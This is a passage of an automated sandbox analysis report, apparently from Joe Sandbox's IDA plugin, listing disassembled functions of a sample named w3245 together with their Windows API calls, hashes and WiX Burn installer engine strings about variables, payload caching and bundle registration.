                                                                                                                                                              • API String ID: 2407829081-3274134579
                                                                                                                                                              • Opcode ID: ee9e6d75ba4253f68292c02d6bfddc90881a3653dc8bd60a2b6d0e3db56b49ce
                                                                                                                                                              • Instruction ID: 18b449231d6e8813ac63891fd7d28215c65718ac04d3da6a9e7422b74d3af080
                                                                                                                                                              • Opcode Fuzzy Hash: ee9e6d75ba4253f68292c02d6bfddc90881a3653dc8bd60a2b6d0e3db56b49ce
                                                                                                                                                              • Instruction Fuzzy Hash: 1E416072D8123DABCB219B549C49FDA7778AF14710F1001A6F918B7381EA789F858BE1
                                                                                                                                                              Function 007C7FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 007C7FC2
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007C81EA
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get numeric., xrefs: 007C81BC
                                                                                                                                                              • Failed to write literal flag., xrefs: 007C81C3
                                                                                                                                                              • Failed to write variable value as number., xrefs: 007C8194
                                                                                                                                                              • feclient.dll, xrefs: 007C809D, 007C80F3, 007C8134
                                                                                                                                                              • Failed to write variable value as string., xrefs: 007C81AE
                                                                                                                                                              • Failed to get string., xrefs: 007C81B5
                                                                                                                                                              • Failed to write included flag., xrefs: 007C81D8
                                                                                                                                                              • Failed to get version., xrefs: 007C819B
                                                                                                                                                              • Unsupported variable type., xrefs: 007C81A7
                                                                                                                                                              • Failed to write variable count., xrefs: 007C7FDD
                                                                                                                                                              • Failed to write variable value type., xrefs: 007C81CA
                                                                                                                                                              • Failed to write variable name., xrefs: 007C81D1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                                              • API String ID: 3168844106-2118673349
                                                                                                                                                              • Opcode ID: e2be792f49ebcd760b72d329628e2c0b9f181323a64f218144cab37362d3b812
                                                                                                                                                              • Instruction ID: 977b889a97037fa4653692891f4221f82cbc389e12b213f814a9b03a8fb528f7
                                                                                                                                                              • Opcode Fuzzy Hash: e2be792f49ebcd760b72d329628e2c0b9f181323a64f218144cab37362d3b812
                                                                                                                                                              • Instruction Fuzzy Hash: 9771927290062DEBCB929EA4CC45FAE7BA4FF04350F14416EF910A7290DF38DD569B92
                                                                                                                                                              Function 007D97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,007DA843,00000000,00000000,00000000,?,00000000), ref: 007D97CD
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007D97DD
                                                                                                                                                                • Part of subcall function 00804102: Sleep.KERNEL32(?,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,007C4DBC), ref: 00804119
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 007D98E9
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to move %ls to %ls, xrefs: 007D98C1
                                                                                                                                                              • Failed to open payload in working path: %ls, xrefs: 007D980C
                                                                                                                                                              • cache.cpp, xrefs: 007D9801
                                                                                                                                                              • Moving, xrefs: 007D987F
                                                                                                                                                              • Copying, xrefs: 007D9888, 007D9893
                                                                                                                                                              • Failed to verify payload signature: %ls, xrefs: 007D9838
                                                                                                                                                              • Failed to copy %ls to %ls, xrefs: 007D98D7
                                                                                                                                                              • %ls payload from working path '%ls' to path '%ls', xrefs: 007D9894
                                                                                                                                                              • Failed to verify payload hash: %ls, xrefs: 007D9875
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                              • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                                                                                                                              • API String ID: 1275171361-1604654059
                                                                                                                                                              • Opcode ID: 3ec92195b9e1747dedb8ac8f02a2a55f3df2715632a60216bc05b6fbcd1c2bb6
                                                                                                                                                              • Instruction ID: fde2f8cf076c756ec2cfe9e81547527d4f427862a260338dda4fd08d9dbe060a
                                                                                                                                                              • Opcode Fuzzy Hash: 3ec92195b9e1747dedb8ac8f02a2a55f3df2715632a60216bc05b6fbcd1c2bb6
                                                                                                                                                              • Instruction Fuzzy Hash: 6331DF71A40634BBDA3126558C4AF6B293CFF42F60F010126FF15BB381D669DC00A6E1
                                                                                                                                                              Function 007C65C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 007C65FC
                                                                                                                                                                • Part of subcall function 00800ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5EB2,00000000), ref: 00800AE0
                                                                                                                                                                • Part of subcall function 00800ACC: GetProcAddress.KERNEL32(00000000), ref: 00800AE7
                                                                                                                                                                • Part of subcall function 00800ACC: GetLastError.KERNEL32(?,?,?,007C5EB2,00000000), ref: 00800AFE
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C6628
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6636
                                                                                                                                                              • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 007C666E
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C6678
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C66BB
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C66C5
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get 32-bit system folder., xrefs: 007C66A6
                                                                                                                                                              • Failed to get 64-bit system folder., xrefs: 007C6664
                                                                                                                                                              • Failed to set system folder variant value., xrefs: 007C6724
                                                                                                                                                              • Failed to backslash terminate system folder., xrefs: 007C6708
                                                                                                                                                              • variable.cpp, xrefs: 007C665A, 007C669C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                                              • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                                                                                                                              • API String ID: 325818893-1590374846
                                                                                                                                                              • Opcode ID: b15e8aa668086875536b48c25e45fb80fa6e949ede2431fab28329829824e141
                                                                                                                                                              • Instruction ID: a1cef2beb9c899d8f0b4a83cbb7bb54d6bf78218dff39ad1c7925ec505393646
                                                                                                                                                              • Opcode Fuzzy Hash: b15e8aa668086875536b48c25e45fb80fa6e949ede2431fab28329829824e141
                                                                                                                                                              • Instruction Fuzzy Hash: 7731E272D41235A7DB309BA58C8DF9A77A8AF00760F01456DBD14FB280EB7CDD408AE1
                                                                                                                                                              Function 007D3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007D3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,007D3FB5,feclient.dll,?,00000000,?,?,?,007C4B12), ref: 007D3B42
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,007C4B12,?,?,0080B488,?,00000001,00000000,00000000), ref: 007D404C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseSleep
                                                                                                                                                              • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                              • API String ID: 2834455192-2673269691
                                                                                                                                                              • Opcode ID: 2716a246cf0e43996114d506a70e9644b45be9894df2ea8d3d6aa15bc55beffa
                                                                                                                                                              • Instruction ID: 3348b62bf7576bb0dbfd667350eeb1906f0c5fd74bf91dd2ab42fef821b1fb05
                                                                                                                                                              • Opcode Fuzzy Hash: 2716a246cf0e43996114d506a70e9644b45be9894df2ea8d3d6aa15bc55beffa
                                                                                                                                                              • Instruction Fuzzy Hash: 3361C471A00619BBDF219F64CC46B6A7BB8FF10350F08416AF901EB390E779EE909791
                                                                                                                                                              Function 007C6DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000001,?,00000000,007C5445,00000006,?,007C82B9,?,?,?,00000000,00000000,00000001), ref: 007C6DC8
                                                                                                                                                                • Part of subcall function 007C56A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,007C6595,007C6595,?,007C563D,?,?,00000000), ref: 007C56E5
                                                                                                                                                                • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,007C563D,?,?,00000000,?,?,007C6595,?,007C7F02,?,?,?,?,?), ref: 007C5714
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,007C82B9), ref: 007C6F59
                                                                                                                                                              Strings
                                                                                                                                                              • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 007C6ED0
                                                                                                                                                              • Attempt to set built-in variable value: %ls, xrefs: 007C6E56
                                                                                                                                                              • Failed to set value of variable: %ls, xrefs: 007C6F41
                                                                                                                                                              • Setting string variable '%ls' to value '%ls', xrefs: 007C6EED
                                                                                                                                                              • Unsetting variable '%ls', xrefs: 007C6F15
                                                                                                                                                              • Setting numeric variable '%ls' to value %lld, xrefs: 007C6EFA
                                                                                                                                                              • Failed to insert variable '%ls'., xrefs: 007C6E0D
                                                                                                                                                              • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 007C6F6B
                                                                                                                                                              • Failed to find variable value '%ls'., xrefs: 007C6DE3
                                                                                                                                                              • variable.cpp, xrefs: 007C6E4B
                                                                                                                                                              • Setting hidden variable '%ls', xrefs: 007C6E86
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                              • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                              • API String ID: 2716280545-445000439
                                                                                                                                                              • Opcode ID: 565d2084fbbf55421fb156f89cf3108655f9df8aaf9aab5a8a45e575ce612885
                                                                                                                                                              • Instruction ID: b5d2af9bcf15fddbebacf6b85b99dcd302b5d924c1a28cc5cc9a6320b6dd95ba
                                                                                                                                                              • Opcode Fuzzy Hash: 565d2084fbbf55421fb156f89cf3108655f9df8aaf9aab5a8a45e575ce612885
                                                                                                                                                              • Instruction Fuzzy Hash: A451C1B1A40225ABDB309F59CC8AF6B3BA8FF55714F10011EF855A62C2C27DED51CAE1
                                                                                                                                                              Function 007D2C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 007D2C8A
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to allocate registration action., xrefs: 007D2CF3
                                                                                                                                                              • Failed to add dependent bundle provider key to ignore dependents., xrefs: 007D2DF4
                                                                                                                                                              • Failed to add dependents ignored from command-line., xrefs: 007D2D3F
                                                                                                                                                              • Failed to create the string dictionary., xrefs: 007D2CC3
                                                                                                                                                              • Failed to add self-dependent to ignore dependents., xrefs: 007D2D0E
                                                                                                                                                              • wininet.dll, xrefs: 007D2ED7
                                                                                                                                                              • Failed to add registration action for self dependent., xrefs: 007D2F57
                                                                                                                                                              • Failed to add registration action for dependent related bundle., xrefs: 007D2F8E
                                                                                                                                                              • Failed to check for remaining dependents during planning., xrefs: 007D2E30
                                                                                                                                                              • crypt32.dll, xrefs: 007D2CD5, 007D2DCF, 007D2EC4, 007D2F39
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                                              • API String ID: 1825529933-1705955799
                                                                                                                                                              • Opcode ID: a83f3558393b012d5a2f74a3f88fc080f8d4a744b26e0d5fbed20bb29ea455fc
                                                                                                                                                              • Instruction ID: fc3870c5d6f1bd6306d5c04a9c9d6f551742c41f6f14238fab4c35de4f7d50fe
                                                                                                                                                              • Opcode Fuzzy Hash: a83f3558393b012d5a2f74a3f88fc080f8d4a744b26e0d5fbed20bb29ea455fc
                                                                                                                                                              • Instruction Fuzzy Hash: B1B17C70A00216EBCF299F24C845BAA7BB5FF24711F10856AF815AB352D738D953CBA1
                                                                                                                                                              Function 007DF90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007DF947
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007DFA2A
                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000027), ref: 007DFA4B
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?), ref: 007DFAF4
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set update bundle., xrefs: 007DFACE
                                                                                                                                                              • Failed to default local update source, xrefs: 007DF9B7
                                                                                                                                                              • Failed to recreate command-line for update bundle., xrefs: 007DFA12
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DFA60
                                                                                                                                                              • update\%ls, xrefs: 007DF9A3
                                                                                                                                                              • Failed to create bundle update guid., xrefs: 007DFA37
                                                                                                                                                              • Failed to convert bundle update guid into string., xrefs: 007DFA6A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                                              • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                                                                                                                              • API String ID: 171215650-2594647487
                                                                                                                                                              • Opcode ID: 756599af9caa826ac74c81c484d5dd7bf0bf6cf8b126f356e8ac16ada26e4833
                                                                                                                                                              • Instruction ID: 4ec59914dfbcd6c2f6c806cfa080e92c457acb7907b4c42db02b23c9e3daf32c
                                                                                                                                                              • Opcode Fuzzy Hash: 756599af9caa826ac74c81c484d5dd7bf0bf6cf8b126f356e8ac16ada26e4833
                                                                                                                                                              • Instruction Fuzzy Hash: 6B616B31940215EBCF219FA4C849FAA7BB8FF48710F15817AF80AEB251D7799C40CB91
                                                                                                                                                              Function 007C4AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindow.USER32(?), ref: 007C4C64
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007C4C75
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to check global conditions, xrefs: 007C4B49
                                                                                                                                                              • Failed to create the message window., xrefs: 007C4B98
                                                                                                                                                              • Failed to set layout directory variable to value provided from command-line., xrefs: 007C4C06
                                                                                                                                                              • Failed to set action variables., xrefs: 007C4BC4
                                                                                                                                                              • Failed to open log., xrefs: 007C4B18
                                                                                                                                                              • Failed to query registration., xrefs: 007C4BAE
                                                                                                                                                              • Failed while running , xrefs: 007C4C2A
                                                                                                                                                              • WixBundleLayoutDirectory, xrefs: 007C4BF5
                                                                                                                                                              • Failed to set registration variables., xrefs: 007C4BDE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostWindow
                                                                                                                                                              • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                              • API String ID: 3618638489-3051724725
                                                                                                                                                              • Opcode ID: 82d8e190daf39182e323b23c649faff26464c43812c895b43b3c86eec889db27
                                                                                                                                                              • Instruction ID: 3e436b0526e29a607eb213fc92d722d4df6a5140c7f595175ddd3af4e768a5df
                                                                                                                                                              • Opcode Fuzzy Hash: 82d8e190daf39182e323b23c649faff26464c43812c895b43b3c86eec889db27
                                                                                                                                                              • Instruction Fuzzy Hash: F141D971601A1AFBDB765A60CD69FBAB76CFF00760F00421DF814A6260DB78ED5097E1
                                                                                                                                                              Function 007DF051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 007DF06E
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007DF19B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to copy the arguments., xrefs: 007DF12D
                                                                                                                                                              • EngineForApplication.cpp, xrefs: 007DF17C
                                                                                                                                                              • Failed to copy the id., xrefs: 007DF100
                                                                                                                                                              • Failed to post launch approved exe message., xrefs: 007DF186
                                                                                                                                                              • Engine is active, cannot change engine state., xrefs: 007DF089
                                                                                                                                                              • UX requested unknown approved exe with id: %ls, xrefs: 007DF0CE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalHeapSection$AllocateEnterLeaveProcess
                                                                                                                                                              • String ID: Engine is active, cannot change engine state.$EngineForApplication.cpp$Failed to copy the arguments.$Failed to copy the id.$Failed to post launch approved exe message.$UX requested unknown approved exe with id: %ls
                                                                                                                                                              • API String ID: 1367039788-528931743
                                                                                                                                                              • Opcode ID: 80fdea629176d3bc93cbc1fc848215db833a158010ca086762ac926c0c5cb610
                                                                                                                                                              • Instruction ID: 4a31272070b339c763643bfc8c0185002c894cd43f65ebc144c0337a5e891453
                                                                                                                                                              • Opcode Fuzzy Hash: 80fdea629176d3bc93cbc1fc848215db833a158010ca086762ac926c0c5cb610
                                                                                                                                                              • Instruction Fuzzy Hash: 7C31C532641229EBDB219F64DC09F9A77B9EF04720B154426FD05EB351EB3ADD008790
                                                                                                                                                              Function 007D969D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 102fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,007DA7D4,00000000,00000000,00000000,?,00000000), ref: 007D96B8
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA7D4,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 007D96C6
                                                                                                                                                                • Part of subcall function 00804102: Sleep.KERNEL32(?,00000000,?,007D85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,007C4DBC), ref: 00804119
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 007D97A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                              • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                              • API String ID: 1275171361-1187406825
                                                                                                                                                              • Opcode ID: 45efe9d6c834f9166e1e5b26416603740fc58f5fb146eb5a630193b3fab2f836
                                                                                                                                                              • Instruction ID: 0df18943897878fa7c4cd25feba974e7b9f542c7ff66e4f9b9b37d12eca744ed
                                                                                                                                                              • Opcode Fuzzy Hash: 45efe9d6c834f9166e1e5b26416603740fc58f5fb146eb5a630193b3fab2f836
